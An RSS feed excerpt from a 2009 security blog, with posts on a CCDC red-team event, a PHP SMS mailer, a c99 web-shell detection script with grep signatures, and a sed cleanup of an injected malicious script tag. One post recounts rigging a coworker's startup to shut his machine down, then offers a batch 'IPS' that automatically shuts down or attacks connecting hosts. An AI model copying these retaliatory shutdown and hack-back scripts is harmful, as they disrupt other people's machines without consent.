<p><a class="a2a_dd a2a_target addtoany_share_save" href="http://www.addtoany.com/share_save#url=http%3A%2F%2Fwww.digitaloffensive.com%2F2010%2F01%2Fupdates-11510%2F&amp;title=Updates%3A%201%2F15%2F10" id="wpa2a_98"><img src="http://www.digitaloffensive.com/wp-content/plugins/add-to-any/share_save_171_16.png" width="171" height="16" alt="Share"/></a></p>]]></content:encoded>
			<wfw:commentRss>http://www.digitaloffensive.com/2010/01/updates-11510/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>CCDC Documentary Video</title>
		<link>http://www.digitaloffensive.com/2009/11/ccdc-documentary-video/</link>
		<comments>http://www.digitaloffensive.com/2009/11/ccdc-documentary-video/#comments</comments>
		<pubDate>Fri, 06 Nov 2009 14:17:27 +0000</pubDate>
		<dc:creator>Michael</dc:creator>
				<category><![CDATA[Blog]]></category>

		<guid isPermaLink="false">http://www.digitaloffensive.com/?p=87</guid>
		<description><![CDATA[CCDC Documentary Video Released For those that know me each you I volunteer some of my time to help college students who are interested in Information Security put their knowledge to the test through the CCDC (Collegiate Cyber Defense Competition). Each year I join other professional penetration testers and security guru’s to fill the role [...]]]></description>
			<content:encoded><![CDATA[<p><strong>CCDC Documentary Video Released</strong></p>
<p>For those that know me each you I volunteer some of my time to help college students who are interested in Information Security put their knowledge to the test through the CCDC (Collegiate Cyber Defense Competition).</p>
<p>Each year I join other professional penetration testers and security guru’s to fill the role of the “Red Cell”. We become the guys that you learn fear for the next 12 to72 hours depending if it is the regional prelim or regional final CCDC event. We have one purpose and one purpose only to get in to the students fictitious company and cause them to lose points and business.</p>
<p>In the mean time the students are broken down by colleges. The student teams are referred to as the “Blue Cell” and each group has the exact same network that they are working with as well as the exact same business injects they must complete in order to gain points. The students take on the role of a newly hired IT firm as the company had just released all their IT staff for one reason or another and the CEO is demanding the business to continue as normal (Sounds familiar?)</p>
<p>At the end of each event since this is a learning experience for the kids we do a question and answer session to give these students the opportunity to ask us how it was done. What they can do better and so on and so forth.</p>
<p>Now for the first time ever you can see the full length CCDC documentary that was professionally filmed in HD at <a href="http://www.youtube.com/user/CyberWATCHcenter">http://www.youtube.com/user/CyberWATCHcenter</a>.</p>
<p>I make appearances and interviews in several of the videos.</p>
<p style="text-align: center;"><img class="aligncenter size-full wp-image-88" title="mike-hacker" src="http://www.digitaloffensive.com/wp-content/uploads/2009/11/mike-hacker.JPG" alt="mike-hacker" width="506" height="287" /></p>
<p><strong>To learn more about the CCDC check the following sites:</strong></p>
<p><a href="http://www.cyberwatchcenter.org/">http://www.cyberwatchcenter.org/</a></p>
<p><a href="http://www.nationalccdc.org/">http://www.nationalccdc.org/</a></p>
<p><a class="a2a_dd a2a_target addtoany_share_save" href="http://www.addtoany.com/share_save#url=http%3A%2F%2Fwww.digitaloffensive.com%2F2009%2F11%2Fccdc-documentary-video%2F&amp;title=CCDC%20Documentary%20Video" id="wpa2a_100"><img src="http://www.digitaloffensive.com/wp-content/plugins/add-to-any/share_save_171_16.png" width="171" height="16" alt="Share"/></a></p>]]></content:encoded>
			<wfw:commentRss>http://www.digitaloffensive.com/2009/11/ccdc-documentary-video/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>PHP SMS Sender</title>
		<link>http://www.digitaloffensive.com/2009/10/php-sms-sender/</link>
		<comments>http://www.digitaloffensive.com/2009/10/php-sms-sender/#comments</comments>
		<pubDate>Thu, 22 Oct 2009 01:24:14 +0000</pubDate>
		<dc:creator>Michael</dc:creator>
				<category><![CDATA[Code]]></category>

		<guid isPermaLink="false">http://www.digitaloffensive.com/?p=81</guid>
		<description><![CDATA[Simple SMS sender It is no secret that almost all the cell phone companies today allow you to send txt messages to a person’s cell phone for free by means of emailing them a txt. This does not mean the company will not charge the receiver but the sender will not be charged.  To do [...]]]></description>
			<content:encoded><![CDATA[<p>Simple SMS sender</p>
<p>It is no secret that almost all the cell phone companies today allow you to send txt messages to a person’s cell phone for free by means of emailing them a txt. This does not mean the company will not charge the receiver but the sender will not be charged.  To do this all you need is a email client or a web mail client and the following information:</p>
<p>T-Mobile: <em>phonenumber</em>@tmomail.net<br />
Virgin Mobile: <em>phonenumber</em>@vmobl.com<br />
Cingular: <em>phonenumber</em>@cingularme.com<br />
Sprint: <em>phonenumber</em>@messaging.sprintpcs.com<br />
Verizon: <em>phonenumber</em>@vtext.com<br />
Nextel: <em>phonenumber</em>@messaging.nextel.com</p>
<p>For example if I want to txt 717-555-1234 and that user is a Verizon user you would simply put <a href="mailto:7175551234@vtext.com">7175551234@vtext.com</a> in the “To” field and enter a small message in the body. Remember most cell phones are limited to 160 characters and cannot handle all the crazy things a standard email can.</p>
<p>Though an enough on this as you are here to learn about the code and a simple Google and can provide you with more information on the above topic.</p>
<p>Since I rarely try to PHP program I decided to write a PHP e-mailer that basically gave the user the ability to use a web form to send a SMS message to someone through an email.</p>
<p><img class="aligncenter size-full wp-image-82" title="sms" src="http://www.digitaloffensive.com/wp-content/uploads/2009/10/sms.jpg" alt="sms" /></p>
<p>The URL above will no longer work I removed the file so spammers and script kiddies could not use it.</p>
<p>To follow a long you need to have basic knowledge of PHP and HTML. If you do then this will be simple for you.  To view the code you can download it by click here <a href="http://www.digitaloffensive.com/mailer.txt" target="_blank">http://www.digitaloffensive.com/mailer.txt</a></p>
<p><strong>Section 1: </strong>This contains the author’s information as well as a warning about using the script as it is not written securely. This section also contains the die command to stop scrip kiddies from using file include and leaching off the script.</p>
<p><strong>Section 2:</strong> Is the actual PHP code this is where I define the variables by using $variableName = $_POST[‘textboxName’]. I use the POST command instead of the GET command as POST is used for tasks that will be done in the background and not displayed to the end user in the URL. In this section I also put basic logic check functionality in. Basically by using “if isset” I am able to define a field to make sure something is inserted before executing the code. If I did not have this in their every time the page loaded it would try to send and fail since no fields are defined by default. The final key element of this section is the “mail” command this is a PHP built in command and will use the “sendmail” application to send mail.</p>
<p><strong>Section 3:</strong> This section contains the actual code to make the form. This is the entire html that makes the text boxes and submit button. The key elements here are the names I used for the text box in the “id=”  or in the “name=” field as they tie in directly with the variables in the PHP section.</p>
<p>That covers all the code if you have any questions please feel free to post a comment and I will answer them. I plan to develop security in this app as I sharpen my skills of the PHP language past just searching for vulnerabilities.</p>
<p><a class="a2a_dd a2a_target addtoany_share_save" href="http://www.addtoany.com/share_save#url=http%3A%2F%2Fwww.digitaloffensive.com%2F2009%2F10%2Fphp-sms-sender%2F&amp;title=PHP%20SMS%20Sender" id="wpa2a_102"><img src="http://www.digitaloffensive.com/wp-content/plugins/add-to-any/share_save_171_16.png" width="171" height="16" alt="Share"/></a></p>]]></content:encoded>
			<wfw:commentRss>http://www.digitaloffensive.com/2009/10/php-sms-sender/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>c99 and variant PHP shell detection, quarantine and removal</title>
		<link>http://www.digitaloffensive.com/2009/10/c99-and-variant-php-shell-detection-quarantine-and-removal/</link>
		<comments>http://www.digitaloffensive.com/2009/10/c99-and-variant-php-shell-detection-quarantine-and-removal/#comments</comments>
		<pubDate>Thu, 08 Oct 2009 18:52:58 +0000</pubDate>
		<dc:creator>Michael</dc:creator>
				<category><![CDATA[Code]]></category>

		<guid isPermaLink="false">http://www.digitaloffensive.com/?p=76</guid>
		<description><![CDATA[c99 and variant PHP shell detection, quarantine and removal Every day I review my web server’s visitor stats and logs and the other day I noticed something odd. I saw a URL that was accessed 35 times from the same exact IP and I did not recognize the file as being a part of Word [...]]]></description>
			<content:encoded><![CDATA[<p><strong>c99 and variant PHP shell detection, quarantine and removal</strong></p>
<p>Every day I review my web server’s visitor stats and logs and the other day I noticed something odd. I saw a URL that was accessed 35 times from the same exact IP and I did not recognize the file as being a part of Word Press or any static page I have uploaded.  The file was called Photo13.php. While investigating this file I noticed several files with the time stamp of the night before. These new files were a part of the breach. In total there was three files found. The c99 PHP shell and two other scripts 1 was used to drop webmail.exe on to a visitor’s machine and the other was to email passwords from webmail users to the owner.</p>
<p>Before you all jump on me about Word Press and its security flaws let me assure you I try to make sure to keep the core up to date every time there is an available update. I believe the breach was either on the host side, a weak cPanel password of one of my client sites or the twitter plug-in on the Word Press site.  I am personally leading more on the twitter plug-in or the hosts as these sites have been hosted for over two years on another host with the same configurations and there was not an issue until recently. Also today there was an important upgrade warning about the twitter plug-in.</p>
<p>This got me thinking how I can be sure to have removed all copies of c99 PHP shell and its variants that the attacker might have installed and how I can take a more active approach in detecting this shell and others. When I copied the c99 PHP shell to my local machine and viewed the code I noticed that it is encoded in base 64 as many of you already know that. When you decode this you get a compressed file it is not until you decompress the file you can see the actual code. If you are interested in decoding this file I suggest using Google to search for “gzinflate base64_decode”. Though it was encrypted I did notice that the coding was the same for several c99 PHP shells that I found on other peoples sites via Google.</p>
<p>With this information I decided I could reliably detect a potentially infected file by running it through three separate string checks. So I wrote the following shell script: To download the code in a .sh file <a title="http://www.digitaloffensive.com/c99fix.sh" href="http://www.digitaloffensive.com/c99fix.sh" target="_blank">click here</a> (Word Press messes up the formatting.)</p>
<blockquote><p>#/bin/bash<br />
##################################################################<br />
### c99 and variant shell detection, quarantine and or removal ###<br />
### Created by: Michael LaSalvia on 10/08/09                   ###<br />
### Site: http://www.digitaloffensive.com                      ###<br />
### Not responsible for your use of this script                ###<br />
##################################################################<br />
#Variables: if you dont know what you are doing leave these as is<br />
txtInfect=/tmp/php.txt<br />
dirSearch=/var/www/<br />
qInfected=/tmp/infected<br />
ck1=/tmp/c99check1.txt<br />
ck2=/tmp/c99check2.txt<br />
ck3=/tmp/c99check3.txt</p>
<p>echo &#8220;########################################################&#8221;<br />
echo &#8220;## Creating needed files and cleaning old check files ##&#8221;<br />
echo &#8220;## Ignore errors here                                 ##&#8221;<br />
echo &#8220;########################################################&#8221;<br />
mkdir $qInfected<br />
rm -f $ck1 $ck2 $ck3 $txtInfect</p>
<p>echo &#8220;########################################################&#8221;<br />
echo &#8220;### STARTING SEARCH FOR c99 and vairants            ####&#8221;<br />
echo &#8220;########################################################&#8221;</p>
<p>find $dirSearch -name \*.php &gt;&gt; $txtInfect<br />
for c99 in $(cat $txtInfect)<br />
do<br />
if grep &#8220;gzinflate&#8221; $c99 &gt; /dev/null; then<br />
echo &#8220;$c99 is infected **CHECK 1 of 3**&#8221;<br />
echo $c99 &gt;&gt; $ck1<br />
for c992 in $(cat $ck1)<br />
do<br />
if grep &#8220;&#8217;7X1rcxs5kuBnd0T&#8221; $c992 &gt; /dev/null; then<br />
echo &#8220;$c992 is infected **CHECK 2 of 3**&#8221;<br />
echo $c992 &gt;&gt; $ck2<br />
for c993 in $(cat $ck2)<br />
do<br />
if grep &#8220;/wxMNVWOra7tTSb4BOrTD7FuM+847ZoXbxU7K2m2Elzg1RYWkhKujJiJa6QaqTwy9X5tCDZ6f77AUoj9XtkXuWQ5ROgowOYpU59wydY/&#8221; $c993 &gt; /dev/null; then<br />
echo &#8220;$c993 is infected **CHECK 3 of 3**&#8221;<br />
echo $c993 &gt;&gt; $ck3<br />
echo -e &#8220;##############################################################&#8221;<br />
echo -e &#8220;## After 3x c99 code has been found in the following files: ##&#8221;<br />
cat $ck3.txt<br />
echo -e &#8220;##############################################################&#8221;<br />
echo -e &#8220;#####  Press 1: To delete these files **WARNING**        #####&#8221;<br />
echo -e &#8220;#####  Press enter: Rename the infected php to .txt      #####&#8221;<br />
echo -e &#8220;#####  and move it to $qInfected for review           #####&#8221;<br />
echo -e &#8220;##############################################################&#8221;<br />
echo -e &#8220;Please enter your choice:    &#8221;<br />
read yChoice<br />
if [ "$yChoice" == 1 ]<br />
then<br />
for rmInfect in $(cat $ck3)<br />
do<br />
rm -f $rmInfect<br />
echo &#8220;** $rmInfect has been removed&#8221;<br />
done<br />
else<br />
for mvRname in $(cat $ck3)<br />
do<br />
mv $mvRname $mvRname.txt<br />
mv $mvRname.txt $qInfected<br />
echo &#8220;$mvRname has been renamed to $mvRname.txt&#8221;<br />
echo $mvRname.txt has been moved to $qInfected<br />
done<br />
fi<br />
fi<br />
done<br />
fi<br />
done<br />
fi<br />
done<br />
rm -f $ck1 $ck2 $ck3 $txtInfect</p></blockquote>
<p>The shell script is based on my worm detection shell script, which can be found here: <a title="http://www.digitaloffensive.com/2009/10/removing-a-mass-web-site-infection/" href="http://www.digitaloffensive.com/2009/10/removing-a-mass-web-site-infection/" target="_blank">http://www.digitaloffensive.com/2009/10/removing-a-mass-web-site-infection/</a>. This script basically searches the “PATH” you provide it for all the files on your system with a .php extension and saves them to a file. The script then checks each file that is the list using three nested “for loops”. The first for loop checks for the string “gzinflate” as that is not a common command in most web scripts. If the string is detected it logs the file and path to another file, if there is no possible infection it will end the script. If the string was found the next for loop will search the possible infected files for the string “&#8217;7X1rcxs5kuBnd0T” Once again if the string is found it will copy the file path and name to another file and if nothing is detected it will end the script. The last for loop searches for the string “/wxMNVWOra7tTSb4BOrTD7FuM+847ZoXbxU7K2m2Elzg1RYWkhKujJiJa6QaqTwy9X5tCDZ6f77AUoj9XtkXuWQ5ROgowOYpU59wydY/”. If this string is detected it saves the file path and name to another file. You are then prompted to take action against the script. You will have the option to enter “1” to remove all the infected files that were found or you can just press any other key (enter) and it will rename the file to give it a .txt extension so the attacker cannot execute it, it will also move the file to a quarantined folder in your /tmp directory for your review.</p>
<p>If you have any questions, comments or concerns please feel free to post them or contact me.</p>
<p><a class="a2a_dd a2a_target addtoany_share_save" href="http://www.addtoany.com/share_save#url=http%3A%2F%2Fwww.digitaloffensive.com%2F2009%2F10%2Fc99-and-variant-php-shell-detection-quarantine-and-removal%2F&amp;title=c99%20and%20variant%20PHP%20shell%20detection%2C%20quarantine%20and%20removal" id="wpa2a_104"><img src="http://www.digitaloffensive.com/wp-content/plugins/add-to-any/share_save_171_16.png" width="171" height="16" alt="Share"/></a></p>]]></content:encoded>
			<wfw:commentRss>http://www.digitaloffensive.com/2009/10/c99-and-variant-php-shell-detection-quarantine-and-removal/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>Removing a mass web site infection</title>
		<link>http://www.digitaloffensive.com/2009/10/removing-a-mass-web-site-infection/</link>
		<comments>http://www.digitaloffensive.com/2009/10/removing-a-mass-web-site-infection/#comments</comments>
		<pubDate>Mon, 05 Oct 2009 17:16:01 +0000</pubDate>
		<dc:creator>Michael</dc:creator>
				<category><![CDATA[Code]]></category>

		<guid isPermaLink="false">http://www.digitaloffensive.com/?p=73</guid>
		<description><![CDATA[Years ago I was big into web hosting and was constantly offering my services to hosts to correct security issues and clean up other issues. One day I found a post where a hosting company had every .php .html .htm and so on page infected with malicious code through a security breach. After finding and [...]]]></description>
			<content:encoded><![CDATA[<p>Years ago I was big into web hosting and was constantly offering my services to hosts to correct security issues and clean up other issues. One day I found a post where a hosting company had every .php .html .htm and so on page infected with malicious code through a security breach. After finding and securing the original breach I wrote this peace of code to go through the system finding all web based files that contained the infectious code and removed it from the pages.  I am now publishing the code on my site for others to use: (<strong><span style="color: #ff0000;">WARNING</span></strong> I would not just copy and use this code without some knowledge and backing up your system. Some tweaks may be needed to help you with your issue.)</p>
<blockquote><p>CODE:</p>
<p>#!/bin/sh<br />
&gt; .tmp<br />
find /home/ -name \*.php &gt;&gt; php.txt<br />
find /home/ -name \*.html &gt;&gt; php.txt<br />
find /home -name \*.htm &gt;&gt; php.txt<br />
for infected in $(cat php.txt)<br />
do<br />
if grep &#8220;http://www.domainstat.net/stat.php&#8221; $infected &gt; /dev/null; then<br />
echo &#8220;$infected is infected now cleaning&#8221;<br />
sed -f clean $infected &gt; .tmp ; mv .tmp $infected<br />
echo &#8220;$infected cleaned&#8221;<br />
else<br />
echo &#8220;$infected is not infected: moving on&#8221;<br />
fi<br />
done<br />
&gt; php.txt</p>
<p>The below code is the clean script that I reference:<br />
s/&lt; ? echo &#8220;&lt;script language=&#8217;JavaScript&#8217; type=&#8217;text\/javascript&#8217; src=&#8217;http:\/\/www.domainstat.net\/stat.php&#8217;&gt;&lt; \/script&gt;&#8221;; ?&gt;//<br />
s/&lt;script language=&#8217;JavaScript&#8217; type=&#8217;text\/javascript&#8217; src=&#8217;http:\/\/www.domainstat.net\/stat.php&#8217;&gt;&lt; \/script&gt;//</p></blockquote>
<p>The code above is a shell script written to search /home (this was written for a cpanel server, most Linux servers store web files in /var/www/html) for files that have common web extensions.  Once it lists all the files into a file called php.txt it then greps through each file looking for the infectious code. If it finds the code it copies the page to a tmp file, uses sed to remove the infectious code and then renames the tmp file back to the original.</p>
<p>If  you have any questions or concerns please feel free to post a comment.</p>
<p><a class="a2a_dd a2a_target addtoany_share_save" href="http://www.addtoany.com/share_save#url=http%3A%2F%2Fwww.digitaloffensive.com%2F2009%2F10%2Fremoving-a-mass-web-site-infection%2F&amp;title=Removing%20a%20mass%20web%20site%20infection" id="wpa2a_106"><img src="http://www.digitaloffensive.com/wp-content/plugins/add-to-any/share_save_171_16.png" width="171" height="16" alt="Share"/></a></p>]]></content:encoded>
			<wfw:commentRss>http://www.digitaloffensive.com/2009/10/removing-a-mass-web-site-infection/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>A little command line FU for you.  Small but effective Free IPS and Firewall.</title>
		<link>http://www.digitaloffensive.com/2009/09/a-little-command-line-fu-for-you-small-but-effective-free-lan-ips/</link>
		<comments>http://www.digitaloffensive.com/2009/09/a-little-command-line-fu-for-you-small-but-effective-free-lan-ips/#comments</comments>
		<pubDate>Sat, 26 Sep 2009 01:30:38 +0000</pubDate>
		<dc:creator>Michael</dc:creator>
				<category><![CDATA[Papers]]></category>

		<guid isPermaLink="false">http://www.digitaloffensive.com/?p=61</guid>
		<description><![CDATA[A little command line FU for you.  Small but effective Free IPS and Firewall. First off here are a few caveats that I need to mention before I get bombarded by people complaining that it does not always work. This requires a state full connection IE. icmp will not get detected. The connection may get [...]]]></description>
			<content:encoded><![CDATA[<p><strong>A little command line FU for you.  Small but effective Free IPS and Firewall.</strong></p>
<p>First off here are a few caveats that I need to mention before I get bombarded by people complaining that it does not always work.</p>
<ol>
<li>This requires a state full connection IE. icmp will not get detected.</li>
<li>The connection may get missed if it is only 1 packet IE. Netsend.</li>
<li>Since this uses a loop there may be a delay and you may miss the connection.</li>
</ol>
<p>This all started when last Friday my computer popped up a message saying it was about to reboot and one of my new co workers started laughing at my displeasure so I knew he did something. Turns out he was just learning how to use Pstools to execute commands and other things.  If you do not know what Pstools are I suggest you Google it as they are some powerful free tools written by a security researcher and purchased by Microsoft.  For those that know what Pstools are and are asking yourself why he has admin to my machine in the first place, the answer is simple we are members of the security team we have admin over all machines in the domain (not domain admin) so we can do our job duties when asked. We will leave it at that, knowing that if I was allowed to and able to I would remove everyone from my machine that did not need access to it.</p>
<p>Normally I would have just laughed along with him but I was working on a report and this basically made me pull out all stops. To buy me some time and offer a quick retribution I created a bat file with the following code in it and placed it in his user profile start up.</p>
<p>@echo off</p>
<p>psshutdown.exe -m &#8220;HAHA&#8221;</p>
<p>Note I did not have to supply the path to the psshutdown command as my co worker was nice enough to make my job easier and put Pstools into his environment for me.</p>
<p>The command above will basically display the message HAHA as it countdowns 20 seconds before shutting down his machine. By placing it in his user profile startup it would shutdown the machine every time he logged in. I did it this way so any one of the team could still log in and fix the machine in case he could not figure this out.</p>
<p>Once this was done I executed the command psshutdown.exe <a href="file://///HIS_IP">\\HIS_IP</a> –m “HAHA” manually to start the fun.  Once he realized that every time he was to log in his machine was to reboot. I informed him if you want to hack you need to learn how to protect against hacks and how to investigate compromised machines. I told him to think about what is happening and what could be causing it to happen.  After a few tries he finally figured it out and corrected the issues.</p>
<p>This leads me into why I am writing this article and the code that you are probably here to see. After him rebooting me and knowing that it could happen again at any given time I started pondering different ways I could detect and counter future attempts without having to purchase any software or installing any tools from internet.  I knew in Linux I could use the netstat command and grep to find his IP when a connection is made to me and then pipe that IP into another command such as adding it to the host.deny list or to a firewall rule or even going as far as using metaploit to attack him back automatically. But unfortunately we do not run Linux desktop environments so I was stuck with a windows environment and basic knowledge of windows scripting. I find it annoying that I could write a Linux shell script that could take over the world (not really but you get the point) in my sleep but it takes me a few days of research and trial and errors to write a windows batch file. I think most of it has to deal with the fact I just never really needed to do them as often as I have had to do them on Linux and when I have I usually just used Perl or CGYWIN but I degress. So based on what I know I could do on Linux I started to think about what I could do on windows to offer a layer of protection and I came up with this with help from another co-worker:</p>
<p>@echo off</p>
<p>:top</p>
<p>for %%a in (192.168.1.2 192.168.1.3 192.168.1.4) do call :SubRoutine %%a</p>
<p>goto top</p>
<p>:SubRoutine</p>
<p>netstat -an | find &#8220;%1&#8243;</p>
<p>if &#8220;%errorlevel%&#8221; NEQ &#8220;0&#8243; goto end</p>
<p>echo &#8220;ATTACKER DETECTED&#8221;</p>
<p>psshutdown.exe -m &#8220;HAHAHA your bad&#8221; \\%1</p>
<p>goto end</p>
<p>:end</p>
<p>This script will basically continue to run monitoring the netstat command output every second to look for the IP addresses I have supplied to it. If the IP is found it will give error code 0 meaning it was successful and then execute the psshutdown command against that box stopping the attack and shutting down the attacker.</p>
<p>Now I know what you are thinking, this only works if you have admin on their box and you are correct. This also does not assume they are not attacking you and are actually connecting to you for a business need. So let’s first address the issue of you not being admin and what options you are then left with to protect yourself.  Unfortunately the windows firewall is not very useful it takes all or nothing approach and does not allow individual IP or port blocking. It basically says if on and no exception then block everything. So to administrate something like that from a batch file on the fly is not very sufficient.  Actually windows itself truelly lacks the ability to easily and quickly respond. There is no host.deny or Iptables or service.deny like in Linux. You could possibly learn how to use PKI and IPSEC ; and right rules to do that stuff in there based on systems though that is extremely tough for most windows users.</p>
<p>This led me to search on the internet for a way to close connections via the windows command line. Several of the tools I found such as TCPKill or WinTCPKill were automatically deleted by McAfee because they are considered hacking tools. So I continued to look for a tool that would work and was safe for use, not saying those other tools are not safe though McAfee is a requirement here.  The tool I found was CurrPorts by the guys over at <a href="http://www.nirsoft.net/utils/cports.html">http://www.nirsoft.net/utils/cports.html</a> . Using this tool let’s take a look at what the code will now look like:</p>
<p>@echo off</p>
<p>:top</p>
<p>for %%a in (192.168.1.2 192.168.1.3 192.168.1.4) do call :SubRoutine %%a</p>
<p>goto top</p>
<p>:SubRoutine</p>
<p>netstat -an | find &#8220;%1&#8243;</p>
<p>if &#8220;%errorlevel%&#8221; NEQ &#8220;0&#8243; goto end</p>
<p>echo &#8220;ATTACKER DETECTED&#8221;</p>
<p>cports.exe /close * * %1 *</p>
<p>goto end</p>
<p>:end</p>
<p>As you can see above we replaced the “psshutdown” command with the “cports.exe” command. The syntax above uses the /close flag which closes established connections. The * * refers to the local host and the source port. The asterisk allows for wildcards. The %1 is the IP address we want to close and the last * is for the remote port. This seems to work 99% of the time. In our testing we noticed that if a person tried to connect to a port this killed the connection. If they did something like an http request there was a chance we missed the connection since it is not on going. We also noticed that it did not catch share access. We did notice it stopped logins, net cat, telnet, ftp, pstools and more.</p>
<p>Here is a screenshot of the attack without getting blocked by my script:</p>
<p><img class="aligncenter size-full wp-image-64" title="allowed" src="http://www.digitaloffensive.com/wp-content/uploads/2009/09/allowed.jpg" alt="allowed" /></p>
<p>Here is a screenshot of the attack being blocked by my script. As you can see I am sending a “RST” flag to the attacker to reset their connection which basically kills the handshake and connection:</p>
<p><img class="aligncenter size-full wp-image-63" title="deny" src="http://www.digitaloffensive.com/wp-content/uploads/2009/09/deny.jpg" alt="deny" /></p>
<p>Now that we addressed not having administrator access and still being able to help block unwanted attacks let’s look at extending this script to be able to capture the port as well. This will be useful as you will see shortly.</p>
<p>@echo off</p>
<p>:top</p>
<p>for %%a in (192.168.1.2 192.168.1.3 192.168.1.4) do call :SubRoutine %%a</p>
<p>goto top</p>
<p>:SubRoutine</p>
<p>for /f &#8220;tokens=2&#8243; %%a in (&#8216;netstat -an^|find &#8220;%1&#8243;&#8216;) do set IPnPort=%%a</p>
<p>for /f &#8220;tokens=1-2 delims=:&#8221; %%b in (&#8216;echo %IPnPort%&#8217;) do (</p>
<p>set IP=%%b</p>
<p>set Port=%%c</p>
<p>)</p>
<p>set IPnPort=</p>
<p>if &#8220;%IP%&#8221;==&#8221;" goto end</p>
<p>if &#8220;%Port%&#8221;==&#8221;" goto end</p>
<p>echo ATTACKER DETECTED from %IP% on Port %Port%</p>
<p>cports /close * * %1 %Port%</p>
<p>for %%a in (IP Port) do set %%a=</p>
<p>goto end</p>
<p>:end</p>
<p>The code above allows us to search for the IP address and when the IP is detected it will save the value IP:PORT into the temp variable %IPnPort% it will then run that variable through one more for loop to get the IP and port as two separate variables in this case %%b and %%c which is then turned in the variables %IP% and %Port%. Once we have these two variables we can do a multitude of things. In the sample above we used the variables to specify the IP and port to have cports.exe close. Even though we could of just used an *. In theory we could add another for loop that contained a list of allowed ports and if %Port% was equal to an allowed port it would not kill the connection.</p>
<p>We can also use another third party tool called plink which is part of the putty suite of tools. Plink is a self contained executable that allows you to use the same protocols you find in Putty but via the command line. It also has a very useful flag that allows for a lot of power. The “-m” flag will allow you to send a configuration to a box. For an example we could have our script above use the echo command to write firewall rules to a txt file. We can then use Plink to connect to the firewall and write the rules to the firewall providing an instant protection scheme.  This is extremely helpful for those that run Juniper Netscreen (SSG or earlier) firewalls or CISCO Pix / ASA firewalls. I am not going to cover the syntax for adding rules to the firewalls via the command line for those two firewalls in this paper but I will give you an example. Let’s take the above code and remove the “cports /close” line and add this line instead.</p>
<p>echo “ set %IP% any eq %Port% deny log” &gt;&gt; fw-rules.txt</p>
<p>echo “set any %IP% eq %Port% deny log”  &gt;&gt; fw-rules.txt</p>
<p>echo “wr mem” &gt;&gt; fw-rules.txt</p>
<p>plink USERNAME@HOSTNAME -pw PASSWORD -m fw-rules.txt</p>
<p>&gt;&gt; fw-rules.txt</p>
<p>This code will basically create the firewall rules to deny all connections inbound and outbound to the IP address and port you specified via the variables. Once again the syntax of the rules is not correct but it gives you the insight on what can be done. All you have to do is echo into the fw-rules.txt file any commands you need for your firewall.</p>
<p>To expand this script you can use one other third party tool called “wget” there is a windows port that can be found at http://gnuwin32.sourceforge.net/packages/wget.htm. With this tool you can download lists of blocked IP addresses from different sites on the internet and incorporate it into your script. So if the script detects one of these malicious IP’s are trying to connect to you can auto block it and log it. To do this we can alter the code like this:</p>
<p>@echo off</p>
<p>wget <a href="http://somesite.com/ip.txt">http://somesite.com/ip.txt</a></p>
<p>:top</p>
<p>for /f %%a in (ip.txt) do call :SubRoutine %%a</p>
<p>goto top</p>
<p>:SubRoutine</p>
<p>for /f &#8220;tokens=2&#8243; %%a in (&#8216;netstat -an^|find &#8220;%1&#8243;&#8216;) do set IPnPort=%%a</p>
<p>for /f &#8220;tokens=1-2 delims=:&#8221; %%b in (&#8216;echo %IPnPort%&#8217;) do (</p>
<p>set IP=%%b</p>
<p>set Port=%%c</p>
<p>)</p>
<p>set IPnPort=</p>
<p>if &#8220;%IP%&#8221;==&#8221;" goto end</p>
<p>if &#8220;%Port%&#8221;==&#8221;" goto end</p>
<p>echo ATTACKER DETECTED from %IP% on Port %Port%</p>
<p>ATTACK CODE GOES HERE</p>
<p>for %%a in (IP Port) do set %%a=</p>
<p>goto end</p>
<p>:end</p>
<p>The code above will download a list of known malicious bad sites and monitor connection attempts from those IP addresses against your computer. It will respond to the connection attempt based on the response you want to use. I have give n you several possible responses throughout this paper though don’t limit yourself to those. Use your imagination to expand on this code to make it work for you.</p>
<p>I want to thank you all for reading this and if you have any questions or comments please feel free to contact me. I also want to give special thanks to RunCmd aka Neil for his killer windows scripting skills and patience in helping me.</p>
<p><a class="a2a_dd a2a_target addtoany_share_save" href="http://www.addtoany.com/share_save#url=http%3A%2F%2Fwww.digitaloffensive.com%2F2009%2F09%2Fa-little-command-line-fu-for-you-small-but-effective-free-lan-ips%2F&amp;title=A%20little%20command%20line%20FU%20for%20you.%20%20Small%20but%20effective%20Free%20IPS%20and%20Firewall." id="wpa2a_108"><img src="http://www.digitaloffensive.com/wp-content/plugins/add-to-any/share_save_171_16.png" width="171" height="16" alt="Share"/></a></p>]]></content:encoded>
			<wfw:commentRss>http://www.digitaloffensive.com/2009/09/a-little-command-line-fu-for-you-small-but-effective-free-lan-ips/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Site Update: 9/23/09</title>
		<link>http://www.digitaloffensive.com/2009/09/site-update-92309/</link>
		<comments>http://www.digitaloffensive.com/2009/09/site-update-92309/#comments</comments>
		<pubDate>Wed, 23 Sep 2009 15:01:33 +0000</pubDate>
		<dc:creator>Michael</dc:creator>
				<category><![CDATA[Blog]]></category>

		<guid isPermaLink="false">http://digitaloffensive.com/?p=40</guid>
		<description><![CDATA[For years now we have been using Joomla as our Content Management System but we have decided to stream line all our sites to use word press instead. Please bear with us as we update links and content to work with the new CMS. We are also working on a new logo and will hopefully [...]]]></description>
			<content:encoded><![CDATA[<p>For years now we have been using Joomla as our Content Management System but we have decided to stream line all our sites to use word press instead. Please bear with us as we update links and content to work with the new CMS. We are also working on a new logo and will hopefully have that done and uploaded with in the next 72 hours.</p>
<p>Thanks</p>
<p>Michael</p>
<p><a class="a2a_dd a2a_target addtoany_share_save" href="http://www.addtoany.com/share_save#url=http%3A%2F%2Fwww.digitaloffensive.com%2F2009%2F09%2Fsite-update-92309%2F&amp;title=Site%20Update%3A%209%2F23%2F09" id="wpa2a_110"><img src="http://www.digitaloffensive.com/wp-content/plugins/add-to-any/share_save_171_16.png" width="171" height="16" alt="Share"/></a></p>]]></content:encoded>
			<wfw:commentRss>http://www.digitaloffensive.com/2009/09/site-update-92309/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>BlackBerry Firewall guide</title>
